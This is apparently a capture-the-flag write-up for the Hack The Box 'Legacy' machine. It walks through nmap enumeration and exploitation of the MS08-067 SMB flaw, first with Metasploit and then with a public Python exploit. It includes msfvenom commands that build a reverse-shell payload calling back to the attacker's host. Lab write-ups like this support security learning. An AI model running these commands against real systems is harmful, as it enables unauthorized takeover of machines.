We begin enumeration with nmap for the ports and services.
sudo nmap -sS -sC -sV -O -oA legacy_nmap_initial_scan 10.10.10.4
The results show Windows Server 2003 SP 2.
If we add the flag to scan for vulnerabilities with nmap it will give us a hint.
MS08–067 and MS17–010. That is a good start. Knowing that the version is so old there would probably be a lot of vulnerabilities.
A query with searchsploit return the following:
We see a metasploit module as expected since this is an easy box on HTB.
Run metasploit, find the module and select it:
use exploit/windows/smb/ms08_067_netapi
Set the options, in this case only the IP and you know the drill.
You should get a meterpreter as NT AUTHORITY\SYSTEM.
You can now read the flags. The different thing this time is that there is no “Users” folder in C:\ bur rather the users are in “Documents and Settings”. Since we are admin there is no need for privilege escalation and we can read the root flag right away.
The user flag can be found where you would expect it to be.
We can now do the same without metasploit.
Let’s take a look at the searchsploit result again.
We can try the first one: 40279.py. We read through it with -x.
searchsploit -x windows/remote/40279.py
Mirror the exploit.
searchsploit -m windows/remote/40279.py
Now we can generate our payload with msfvenom and edit the python script.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.X.X LPORT=443 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f py -v shellcode -a x86 — platform windows
Set up netcat listener on 443 and run it with the “6” option an the port. The different options are for the different versions and they are assigned a digit between 1 and 7 in the if statements.
The exploit completes but a shell does not open.
There seems to be some issue with the exploit and you can play around with it to try and get it to work but you can also find a modified version of the same exploit on github and give that a try. Download the modified script.
We again need to generate and modify the payload in the python script with ours in order to get a shell as per the instructions in the comments.
This is how it the modified shellcode looks in my case.
Again generated with:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.X.X LPORT=443 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f py -v shellcode -a x86 — platform windows
Once the script has been edited with the new shellcode you can run it.
If everything was done correctly you should get a netcat shell.
Once again you are running as administrator so you can read both flags.
That was pretty much it for the Legacy box on HTB. It is quite easy to do it with metasploit so if you want extra challenge try it with the script.
I hope you liked the writeup and that it was easy for you to follow along.
Thank you for your time and cya round.
